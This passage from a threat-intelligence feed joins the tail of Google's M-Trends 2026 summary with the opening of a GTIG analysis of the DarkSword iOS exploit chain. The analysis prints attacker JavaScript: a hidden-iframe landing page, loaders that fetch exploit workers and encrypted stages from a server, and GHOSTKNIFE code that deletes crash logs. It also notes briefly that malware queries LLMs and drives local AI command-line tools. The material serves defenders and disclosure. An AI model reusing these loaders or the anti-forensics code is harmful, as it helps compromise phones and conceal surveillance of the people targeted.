baseline;"> Organizations are improving their internal visibility. Across all 2025 investigations, 52% of the time organizations first detected evidence of malicious activity internally, an increase from 43% in 2024.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Targeted Industries:</strong><span style="vertical-align: baseline;"> The </span><span style="vertical-align: baseline;">full scope of incidents affected more than 16 industry verticals, with </span><span style="vertical-align: baseline;">the high tech sector (17%) outpacing the financial sector (14.6%) as the most frequently targeted industry, shifting the financial sector out of the top spot it held in 2024 and 2023.</span></p> </li> </ul> <h3><span style="vertical-align: baseline;">The Collapse of the "Hand-Off" Window</span></h3> <p><span style="vertical-align: baseline;">One of the most notable trends we observed in 2025 is the increased specialization and collaboration within the cyber crime ecosystem. Initial access partners are using low-impact techniques, such as malicious advertisements or the ClickFix social engineering technique, to gain a foothold. They then hand off this access to secondary groups who execute high-impact operations like ransomware.</span></p> <p><span style="vertical-align: baseline;">In 2022, the median time between an initial access event and the hand-off to a secondary threat group was more than 8 hours. In 2025, that window collapsed to just 22 seconds. Initial access partners are increasingly pre-staging the secondary group's preferred malware or tunnels during the initial infection, meaning secondary actors are fully equipped to launch operations the moment they first interact with the network.</span></p> <p><span style="vertical-align: baseline;">This pattern is reflected in how attackers are breaching organizations. We found that prior compromise ranked as the third-most common initial infection vector (10%) for intrusions globally, and the top initial infection vector in ransomware operations (30%), doubling what it was in 2024 (15%).</span></p> <h3><span style="vertical-align: baseline;">Voice Phishing and the SaaS Identity Crisis</span></h3> <p><span style="vertical-align: baseline;">Historically, email phishing has been an adversary staple. But as automated technical controls have improved, email phishing dropped to just 6% of intrusions in 2025. In its place, adversaries have pivoted to highly interactive, voice-based social engineering.</span></p> <p><span style="vertical-align: baseline;">We have extensively documented this progression in blog posts and reports, notably tracking how groups like UNC3944 target IT help desks to bypass multifactor authentication (MFA) and gain initial access to software-as-a-service (SaaS) environments (see: </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/expansion-shinyhunters-saas-data-theft"><span style="text-decoration: underline; vertical-align: baseline;">Vishing for Access: Tracking the Expansion of ShinyHunters-Branded SaaS Data Theft</span></a><span style="vertical-align: baseline;">).</span></p> <p><span style="vertical-align: baseline;">M-Trends 2026 reveals the cascading impact of these techniques. Threat actors are bypassing standard defenses by harvesting long-lived OAuth tokens and session cookies. By compromising third-party SaaS vendors, attackers steal hard-coded keys and personal access tokens, using those secrets to seamlessly pivot into downstream customer environments to execute large-scale data theft.</span></p> <h3><span style="vertical-align: baseline;">Ransomware Evolves into Recovery Denial</span></h3> <p><span style="vertical-align: baseline;">Ransomware groups are no longer just encrypting data; they are actively destroying the ability to recover. In 2025, we observed a </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/ransomware-ttps-shifting-threat-landscape"><span style="text-decoration: underline; vertical-align: baseline;">systemic shift where ransomware operators</span></a><span style="vertical-align: baseline;">, including prolific groups using REDBIKE (Akira) and AGENDA (Qilin), actively targeted backup infrastructure, identity services, and virtualization management planes.</span></p> <p><span style="vertical-align: baseline;">Attackers are exploiting misconfigured Active Directory Certificate Services templates to create admin accounts that bypass password rotation and are actively deleting backup objects from cloud storage. Furthermore, attackers are exploiting the "Tier-0" nature of hypervisors to bypass guest-level defenses. By targeting the virtualization storage layer directly or encrypting hypervisor datastores, they can render all associated virtual machines inoperable simultaneously.</span></p> <p><span style="vertical-align: baseline;">This directly aligns with the complex intrusions we outlined in our guide, </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/defending-vsphere-from-unc3944"><span style="text-decoration: underline; vertical-align: baseline;">From Help Desk to Hypervisor: Defending Your VMware vSphere Estate from UNC3944</span></a><span style="vertical-align: baseline;">. Modern ransomware is now a fundamental resilience problem, forcing organizations into a choice: pay or rebuild.</span></p> <h3><span style="vertical-align: baseline;">Edge Devices, Zero-Days, and Extreme Persistence</span></h3> <p><span style="vertical-align: baseline;">While cyber criminals optimize for speed, espionage groups are optimizing for extreme persistence. Threat clusters like UNC6201 and UNC5807 deliberately target edge and core network devices, such as virtual private networks (VPNs) and routers, that typically lack standard endpoint detection and response (EDR) telemetry. M-Trends 2026 reveals that the mean time to exploit vulnerabilities dropped to an estimated -7 days, meaning exploitation is routinely occurring before a patch is even released. This acceleration underscores the severity of the trends and campaigns we have recently documented, from increasing zero-day usage over 2024 (as reported on in </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/2025-zero-day-review"><span style="text-decoration: underline; vertical-align: baseline;">Look at What You Made Us Patch: 2025 Zero-Days in Review2025 Zero-Days in Review</span></a><span style="vertical-align: baseline;">) to our analysis of </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/unc6201-exploiting-dell-recoverpoint-zero-day"><span style="text-decoration: underline; vertical-align: baseline;">UNC6201 Exploiting a Dell RecoverPoint for Virtual Machines Zero-Day</span></a><span style="vertical-align: baseline;">. By leveraging native packet-capturing functionality on these devices, adversaries can directly intercept sensitive data and plaintext credentials as they transit the network, allowing them to gather intelligence without ever needing to move deeper into traditional sources like workstations or servers.</span></p> <p><span style="vertical-align: baseline;">Attackers are deploying custom, in-memory malware like the </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"><span style="text-decoration: underline; vertical-align: baseline;">BRICKSTORM</span></a><span style="vertical-align: baseline;"> backdoor directly onto these network appliances to establish deep persistence that routinely survives standard remediation efforts and system reboots. Because these devices are designed with minimal onboard storage and cannot support traditional security tooling, conducting file system or memory forensics presents a significant challenge, often leaving security teams with limited artifacts to confirm an attacker's presence or properly scope the remediation. Furthermore, this extreme persistence creates a critical visibility gap. With threats like BRICKSTORM achieving dwell times of nearly 400 days, standard 90-day log retention policies leave organizations completely blind to the initial access vector and the full scope of the intrusion.</span></p> <h3><span style="vertical-align: baseline;">AI Threat Landscape</span></h3> <p><span style="vertical-align: baseline;">A comprehensive overview of the 2025 threat landscape requires addressing adversary use of artificial intelligence (AI). Ongoing Google Threat Intelligence Group research reveals that adversaries are </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/distillation-experimentation-integration-ai-adversarial-use"><span style="text-decoration: underline; vertical-align: baseline;">integrating AI to accelerate the attack lifecycle</span></a><span style="vertical-align: baseline;">. We have seen malware families like PROMPTFLUX and PROMPTSTEAL actively query large language models (LLMs) mid-execution to evade detection, while "distillation attacks" threaten intellectual property by extracting the proprietary logic and specialized training data of high-value machine learning models. M-Trends 2026 confirms attackers are abusing AI within compromised environments. For example, the QUIETVAULT credential stealer was observed checking targeted machines for local AI command-line tools, executing predefined prompts to search for configuration files. </span></p> <p><span style="vertical-align: baseline;">Despite these rapid technological advancements, we do not consider 2025 to be the year where breaches were the direct result of AI. From our view on the frontlines, the vast majority of successful intrusions still stem from fundamental human and systemic failures. However, to ensure organizations are prepared as AI-powered capabilities evolve, Mandiant red teams are actively incorporating AI-driven techniques into engagements—such as prompt injection—to rigorously test defenses against emerging threats. By highlighting the unique risks surrounding AI implementations, such as the abuse of developer toolchains, we help organizations establish behavioral baselines and adopt principles from the </span><a href="https://kstatic.googleusercontent.com/files/00e270b1cccb1f37302462a162c171d86f293a84de54036e0021e2fe0253cf05623bae2a62751b0840667bc6c8412fd70f45c9485972dc370be8394fae922d31" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google Secure AI Framework (SAIF)</span></a><span style="vertical-align: baseline;">. Beyond securing the AI models themselves, we also help organizations leverage AI-powered defense as a force multiplier for security operations. For a deeper dive into AI and security, read our recently published paper, </span><a href="https://cloud.google.com/security/resources/ai-risk-and-resilience"><span style="text-decoration: underline; vertical-align: baseline;">AI risk and resilience: A Mandiant special report</span></a><span style="vertical-align: baseline;">.</span></p> <h3><span style="vertical-align: baseline;">Recommendations for Defenders</span></h3> <p><span style="vertical-align: baseline;">To build true operational resilience and outmaneuver modern adversaries, organizations must move at the speed of the attacker. M-Trends 2026 provides extensive, actionable guidance, including:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Treat Low-Impact Alerts as Critical Indicators:</strong><span style="vertical-align: baseline;"> With hand-off times shrinking to seconds, security teams must restructure response playbooks. Treat routine malware alerts as high-priority indicators of an impending secondary intrusion, and remediate before interactive hands-on-keyboard operations begin.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Isolate Critical Control Planes:</strong><span style="vertical-align: baseline;"> Virtualization and management platforms must be treated as Tier-0 assets with the strictest access constraints. To counter the destruction of recovery capabilities, backup environments should be decoupled from the corporate Active Directory domain and utilize immutable storage (to defend against these attacks, review our guide, </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/preparation-hardening-destructive-attacks"><span style="text-decoration: underline; vertical-align: baseline;">Proactive Preparation and Hardening Against Destructive Attacks: 2026 Edition</span></a><span style="vertical-align: baseline;">).</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Shift to Continuous Identity Verification:</strong><span style="vertical-align: baseline;"> Because interactive social engineering frequently bypasses traditional MFA, organizations must enforce strict least privilege, regularly audit SaaS integrations, and route all SaaS applications through a central identity provider (IdP).</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Transition from Static IOCs to Behavioral Anomaly Detection:</strong><span style="vertical-align: baseline;"> With attackers rapidly changing infrastructure and deploying custom, in-memory malware, relying solely on static indicators of compromise (IOCs) is no longer sufficient. Defenders must implement behavior-based detection models that flag anomalous activity and deviations from established baselines, specifically concerning unauthorized access to edge devices, anomalous bulk API operations, or the suspicious use of SaaS integration tokens.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Expand Visibility and Extend Log Retention:</strong><span style="vertical-align: baseline;"> Deploy advanced threat detection across the entire ecosystem. To close the visibility gap associated with multi-year intrusions, organizations must extend log retention policies well beyond standard 90-day windows. Forward critical network device logs—especially application and administrative logs—and hypervisor-level telemetry to centralized, long-term storage to eliminate the blind spots sophisticated actors rely upon.</span></p> </li> </ul> <h3><span style="vertical-align: baseline;">Be Ready to Respond</span></h3> <p><span style="vertical-align: baseline;">The Mandiant mission is to help keep every organization secure from cyber threats and confident in their readiness. For 17 years, our annual M-Trends report has been a core component of advancing that mission, sharing frontline knowledge to help defenders close critical visibility gaps.</span></p> <p><span style="vertical-align: baseline;">To learn about the cyber threat landscape, and how we recommend organizations adapt to its ongoing changes, explore our M-Trends 2026 resources:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><a href="https://cloud.google.com/security/resources/m-trends?utm_source=cgc-blog&amp;utm_medium=blog&amp;utm_campaign=FY26-Q1-GLOBAL-STO89-website-dl-dgcsm-mtrends26-162712&amp;utm_content=-&amp;utm_term=-"><span style="text-decoration: underline; vertical-align: baseline;">Download the M-Trends 2026 report</span></a> <span style="vertical-align: baseline;">for a comprehensive dive into our frontline data.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Read the </span><a href="https://services.google.com/fh/files/misc/m-trends-2026-executive-edition-en.pdf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">M-Trends 2026 Executive Edition</span></a><span style="vertical-align: baseline;"> for a high-level look at the data and trends, along with key recommendations.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Register for our upcoming </span><a href="https://cloudonair.withgoogle.com/events/m-trends-virtual-event-2026" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">M-Trends 2026 webinar</span></a><span style="vertical-align: baseline;">—the first in a planned series—for an in-depth look at the data, topics, and recommendations discussed in the report.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Listen to a special episode of the </span><a href="https://cloud.withgoogle.com/cloudsecurity/podcast/ep268-weaponizing-the-administrative-fabric-cloud-identity-and-saas-compromise-in-m-trends-2026" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google Cloud Security Podcast featuring M-Trends 2026</span></a><span style="vertical-align: baseline;"> to learn more about what the findings mean and how the report is created.</span></p> </li> </ul></div>Mon, 23 Mar 2026 14:00:00 +0000https://cloud.google.com/blog/topics/threat-intelligence/m-trends-2026/Threat IntelligencearticleGooglehttps://cloud.google.com/blog/topics/threat-intelligence/m-trends-2026/Jurgen Kutscherhttps://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain/<div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Introduction</span><strong style="vertical-align: baseline;"> </strong></h3> <p><span style="vertical-align: baseline;">Google Threat Intelligence Group (GTIG) has identified a new iOS full-chain exploit that leveraged multiple zero-day vulnerabilities to fully compromise devices. Based on toolmarks in recovered payloads, we believe the exploit chain to be called DarkSword. Since at least November 2025, GTIG has observed multiple commercial surveillance vendors and suspected state-sponsored actors utilizing DarkSword in distinct campaigns. These threat actors have deployed the exploit chain against targets in Saudi Arabia, Turkey, Malaysia, and Ukraine.</span></p> <p><span style="vertical-align: baseline;">DarkSword supports iOS versions 18.4 through 18.7 and utilizes six different vulnerabilities to deploy final-stage payloads. GTIG has identified three distinct malware families deployed following a successful DarkSword compromise: GHOSTBLADE, GHOSTKNIFE, and GHOSTSABER. The proliferation of this single exploit chain across disparate threat actors mirrors the previously discovered </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/coruna-powerful-ios-exploit-kit"><span style="text-decoration: underline; vertical-align: baseline;">Coruna iOS exploit kit</span></a><span style="vertical-align: baseline;">. Notably, UNC6353, a suspected Russian espionage group previously observed using Coruna, has recently incorporated DarkSword into their watering hole campaigns.</span></p> <p><span style="vertical-align: baseline;">In this blog post, we examine the uses of DarkSword by these distinct threat actors, provide an analysis of their final-stage payloads, and describe the vulnerabilities leveraged by DarkSword. GTIG reported the vulnerabilities used in DarkSword to Apple in late 2025, and all vulnerabilities were patched with the release of iOS 26.3 (although most were patched prior). We have added domains involved in DarkSword delivery to </span><a href="https://safebrowsing.google.com/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Safe Browsing</span></a><span style="vertical-align: baseline;">, and strongly urge users to update their devices to the latest version of iOS. In instances where an update is not possible, it is recommended that </span><a href="https://support.apple.com/en-us/105120" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Lockdown Mode</span></a><span style="vertical-align: baseline;"> be enabled for enhanced security.</span></p> <p><span style="vertical-align: baseline;">This research is published in coordination with our industry partners at </span><a href="https://www.lookout.com/blog/darksword" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Lookout</span></a><span style="vertical-align: baseline;"> and </span><a href="https://iverify.io/blog/darksword-ios-exploit-kit-explained" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">iVerify</span></a><span style="vertical-align: baseline;">.</span></p> <h3><span style="vertical-align: baseline;">Discovery Timeline</span></h3> <p><span style="vertical-align: baseline;">GTIG has identified several different users of the DarkSword exploit chain dating back to November 2025. In addition to the case studies on DarkSword usage documented in this blog post, we assess it is likely that other commercial surveillance vendors or threat actors may also be using DarkSword.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/darksword-ios-exploit-chain-fig1a.max-1000x1000.jpg" alt="DarkSword iOS Exploit Chain timeline"> </a> <figcaption class="article-image__caption "><p data-block-key="hegv0">Figure 1: Timeline of DarkSword observations and vulnerability patches</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Saudi Arabian Users Targeted via Snapchat-Themed Website (UNC6748)</span></h4> <p><span style="vertical-align: baseline;">In early November 2025, GTIG identified the threat cluster UNC6748 leveraging a Snapchat-themed website, </span><code style="vertical-align: baseline;">snapshare[.]chat</code><span style="vertical-align: baseline;">, to target Saudi Arabian users (Figure 2). The landing page on the website included JavaScript code using a mix of obfuscation techniques, and created a new IFrame that pulled in another resource at </span><code style="vertical-align: baseline;">frame.html</code><span style="vertical-align: baseline;"> (Figure 3). The landing page JavaScript also set a session storage key named </span><code style="vertical-align: baseline;">uid</code><span style="vertical-align: baseline;">, and checked if that key was already set prior to creating the IFrame that fetches the next delivery stage. We assess this is to prevent re-infecting prior victims. In subsequent observations of UNC6748 throughout November 2025, we observed them update the landing page to include anti-debugging and additional obfuscation to hinder analysis. We also identified additional code added when the actor attempts to infect a user using Chrome, where the </span><code style="vertical-align: baseline;">x-safari-https</code><span style="vertical-align: baseline;"> protocol handler is used to open the page in Safari (Figure 4). This suggests that UNC6748 didn't have an exploit chain for Chrome at the time of this activity. During the infection process, the victim is redirected to a legitimate Snapchat website in an attempt to masquerade the activity.</span></p> <p><code style="vertical-align: baseline;">frame.html</code><span style="vertical-align: baseline;"> is a simple HTML file that dynamically injects a new </span><code style="vertical-align: baseline;">script</code><span style="vertical-align: baseline;"> tag that loads in the main exploit loader, </span><code style="vertical-align: baseline;">rce_loader.js</code><span style="vertical-align: baseline;"> (Figure 5). The loader performs some initialization used by subsequent stages, and fetches a remote code execution (RCE) exploit from the server using </span><code style="vertical-align: baseline;">XMLHttpRequest</code><span style="vertical-align: baseline;"> (Figure 6).</span></p> <p><span style="vertical-align: baseline;">We observed UNC6748 activity multiple times throughout November 2025, where both major and minor updates were made to their infection process:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The first UNC6748 activity we observed only had support for one RCE exploit split across two files, </span><code style="vertical-align: baseline;">rce_module.js</code><span style="vertical-align: baseline;"> and </span><code style="vertical-align: baseline;">rce_worker_18.4.js</code><span style="vertical-align: baseline;"> (Figure 7). This exploit primarily leveraged CVE-2025-31277, a memory corruption vulnerability in JavaScriptCore (the JavaScript engine used in WebKit and Apple Safari), and also CVE-2026-20700, a Pointer Authentication Codes (PAC) bypass in </span><code style="vertical-align: baseline;">dyld</code><span style="vertical-align: baseline;">.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We then identified activity several days later where another RCE exploit was added, </span><code style="vertical-align: baseline;">rce_worker_18.6.js</code><span style="vertical-align: baseline;"> (Figure 8). This exploit used CVE-2025-43529, a different memory corruption vulnerability in JavaScriptCore, alongside the same CVE-2026-20700 exploit in the same file.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The loader was modified to also fetch a </span><code style="vertical-align: baseline;">rce_module_18.6.js</code><span style="vertical-align: baseline;"> payload, which only defined a simple function that was not observed in use elsewhere.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">However, the logic implemented for this did not correctly serve the iOS 18.4 exploit if the device version wasn't 18.6, and did not account for the existence of iOS 18.7, even though it was released two months prior in September 2025. This suggests that this update may have been originally written months prior to UNC6748 acquiring and/or deploying it.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Later in November 2025, we observed another module added, </span><code style="vertical-align: baseline;">rce_worker_18.7.js</code><span style="vertical-align: baseline;"> (Figure 9). This was an updated version of </span><code style="vertical-align: baseline;">rce_worker_18.6.js</code><span style="vertical-align: baseline;">, but with offsets added to support iOS 18.7.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">There was also a logic flaw in the loader in this case, as it loaded the exploit for iOS 18.7 regardless of the detected device version.</span></p> </li> </ul> </ul> <p><span style="vertical-align: baseline;">In our observations, UNC6748 used the same modules for sandbox escapes and privilege escalation, along with the same final payload, GHOSTKNIFE.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--medium h-c-grid__col h-c-grid__col--4 h-c-grid__col--offset-4 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/darksword-ios-exploit-chain-fig2.max-1000x1000.png" alt="decoy page"> </a> <figcaption class="article-image__caption "><p data-block-key="ijhn8">Figure 2: snapshare[.]chat decoy page</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>if (!sessionStorage.getItem("uid") &amp;&amp; isTouchScreen) { sessionStorage.setItem("uid", '1'); const frame = document.createElement("iframe"); frame.src = "frame.html?" + Math.random(); frame.style.height = 0; frame.style.width = 0; frame.style.border = "none"; document.body.appendChild(frame); } else { top.location.href = "red"; }</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 3: Landing page snippet that loads </span><code style="vertical-align: baseline;">frame.html</code><span style="vertical-align: baseline;"> (UNC6748, November 2025)</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>&lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;script type="text/javascript"&gt;document.write('&lt;script defer=\"defer\" src=\"rce_loader.js\"\&gt;\&lt;\/script\&gt;');&lt;/script&gt; &lt;/body&gt; &lt;/html&gt;</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 4: </span><code style="vertical-align: baseline;">frame.html</code><span style="vertical-align: baseline;"> contents (UNC6748, November 2025)</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>if (typeof browser !== "undefined" || !isIphone()) { console.log(""); } else { location.href = "x-safari-https://snapshare.chat/&lt;redacted&gt;"; }</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 5: Landing page code snippet showing </span><code style="vertical-align: baseline;">x-safari-https</code><span style="vertical-align: baseline;"> use (UNC6748, November 2025)</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>function getJS(fname,method = 'GET') { try { url = fname; print(`trying to fetch ${method} from: ${url}`); let xhr = new XMLHttpRequest(); xhr.open("GET", `${url}` , false); xhr.send(null); return xhr.responseText; } catch(e) { print("got error in getJS: " + e); } }</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 6: </span><code style="vertical-align: baseline;">rce_loader.js</code><span style="vertical-align: baseline;"> snippet showing the logic for fetching additional stages (UNC6748, November 2025)</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>let workerCode = ""; workerCode = getJS(`rce_worker_18.4.js`); // local version let workerBlob = new Blob([workerCode],{type:'text/javascript'}); let workerBlobUrl = URL.createObjectURL(workerBlob);</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 7: </span><code style="vertical-align: baseline;">rce_loader.js</code><span style="vertical-align: baseline;"> snippet showing a single RCE exploit worker being loaded (UNC6748, November 2025)</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>let workerCode = ""; if(ios_version == '18,6' || ios_version == '18,6,1' || ios_version == '18,6,2') workerCode = getJS(`rce_worker_18.6.js?${Date.now()}`); // local version else workerCode = getJS(`rce_worker_18.6.js?${Date.now()}`); // local version let workerBlob = new Blob([workerCode],{type:'text/javascript'}); let workerBlobUrl = URL.createObjectURL(workerBlob);</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 8: </span><code style="vertical-align: baseline;">rce_loader.js</code><span style="vertical-align: baseline;"> snippet showing (attempted) support for different RCE exploit workers (UNC6748, November 2025)</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>let workerCode = ""; if(ios_version == '18,7') workerCode = getJS(`rce_worker_18.7.js?${Date.now()}`); // local version else workerCode = getJS(`rce_worker_18.7.js?${Date.now()}`); // local version let workerBlob = new Blob([workerCode],{type:'text/javascript'}); let workerBlobUrl = URL.createObjectURL(workerBlob);</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 9: </span><code style="vertical-align: baseline;">rce_loader.js</code><span style="vertical-align: baseline;"> snippet with iOS 18.7 support added (UNC6748, November 2025)</span></span></p></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">GHOSTKNIFE</span></h5> <p><span style="vertical-align: baseline;">In this activity, we observed UNC6748 deploy a backdoor GTIG tracks as GHOSTKNIFE. GHOSTKNIFE, written in JavaScript, has several modules for exfiltrating different types of data, including signed-in accounts, messages, browser data, location history, and recordings. It also supports downloading files from the C2 server, taking screenshots, and recording audio from the device's microphone. GHOSTKNIFE communicates with its C2 server using a custom binary protocol over HTTP, encrypted using a scheme based on ECDH and AES. GHOSTKNIFE can update its config with new parameters from its C2 server.</span></p> <p><span style="vertical-align: baseline;">GHOSTKNIFE writes files to disk during its execution under </span><code style="vertical-align: baseline;">/tmp/&lt;uuid&gt;.&lt;numbers&gt;</code><span style="vertical-align: baseline;">, where </span><code style="vertical-align: baseline;">uuid</code><span style="vertical-align: baseline;"> is a randomly generated UUIDv4 value and </span><code style="vertical-align: baseline;">numbers</code><span style="vertical-align: baseline;"> is a hard-coded sequence of several digits. Under that directory, it creates multiple subfolders including </span><code style="vertical-align: baseline;">STORAGE</code><span style="vertical-align: baseline;">, </span><code style="vertical-align: baseline;">DATA</code><span style="vertical-align: baseline;">, and </span><code style="vertical-align: baseline;">TMP</code><span style="vertical-align: baseline;">. As each module of GHOSTKNIFE executes, it writes its data to </span><code style="vertical-align: baseline;">/tmp/&lt;uuid&gt;.&lt;numbers&gt;/STORAGE/&lt;uuid2&gt;.&lt;id&gt;</code><span style="vertical-align: baseline;">, where </span><code style="vertical-align: baseline;">id</code><span style="vertical-align: baseline;"> is the numeric value of the module and </span><code style="vertical-align: baseline;">uuid2</code><span style="vertical-align: baseline;"> is a different randomly generated UUIDv4 value. Additionally, GHOSTKNIFE periodically erases crash logs from the device to cover its tracks in case of unexpected failures (Figure 10).</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code> cleanLogs(){ let files = MyHelper.getContentsOfDir("/var/mobile/Library/Logs/CrashReporter/"); for(let file of files){//.ips // mediaplaybackd-" panic-full- if(file.includes("mediaplaybackd") || file.includes("SpringBoard") || file.includes("com.apple.WebKit.") || file.includes("panic-full-") ){ MyHelper.deleteFileAtPath(file); } } }</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 10: GHOSTKNIFE snippet responsible for deleting crash logs</span></span></p></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Campaigns Targeting Users in Turkey and Malaysia (PARS Defense)</span></h4> <p><span style="vertical-align: baseline;">In late November 2025, GTIG observed activity associated with the Turkish commercial surveillance vendor PARS Defense where DarkSword was used in Turkey, with support for iOS 18.4-18.7. Unlike the UNC6748 activity, this campaign was carried out with more attention to OPSEC, with obfuscation applied to the exploit loader and some of the exploit stages, and the use of ECDH and AES to encrypt exploits between the server and the victim (Figure 11). Additionally, the obfuscated version of </span><code style="vertical-align: baseline;">rce_loader.js</code><span style="vertical-align: baseline;"> used by PARS Defense fetched the correct RCE exploit depending on the detected iOS version (Figure 12).</span></p> <p><span style="vertical-align: baseline;">Subsequently, in January 2026, GTIG observed additional activity in Malaysia associated with a different PARS Defense customer. In this case, we were able to collect a different loader used in the activity, which contains additional device fingerprinting logic, and also used the </span><code style="vertical-align: baseline;">uid</code><span style="vertical-align: baseline;"> session storage check. This loader also uses the </span><code style="vertical-align: baseline;">top.location.href</code><span style="vertical-align: baseline;"> redirect for targets that do not pass all of the checks like UNC6748 did, but also sets </span><code style="vertical-align: baseline;">window.location.href</code><span style="vertical-align: baseline;"> to the same URL (Figure 13).</span></p> <p><span style="vertical-align: baseline;">Where available, GTIG identified a different final payload used in this activity, a backdoor we track as GHOSTSABER.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>function getJS(_0x12fba8) { const _0x35744f = generateKeyPair(); const _0x4a6eb4 = exportPublicKeyAsPem(_0x35744f.publicKey); const _0x1bc168 = self.btoa(_0x4a6eb4); const _0x119092 = { 'a': _0x1bc168 }; _0x12fba8 = _0x12fba8.startsWith('/') ? _0x12fba8 : '/' + _0x12fba8; const _0x1fedd2 = new XMLHttpRequest(); _0x1fedd2.open('POST', 'https://&lt;redacted&gt;' + (_0x12fba8 + '?' + Date.now()), false); _0x1fedd2.setRequestHeader('Content-Type', 'application/json'); _0x1fedd2.send(JSON.stringify(_0x119092)); if (_0x1fedd2.status === 0xc8) { const _0x362968 = JSON.parse(_0x1fedd2.responseText); const _0x32efb2 = _0x362968.a; const _0x46ca4b = _0x362968.b; const _0xfae3b8 = b64toUint8Array(_0x32efb2); const _0x2f4536 = b64toUint8Array(_0x46ca4b); const _0xa36b4f = 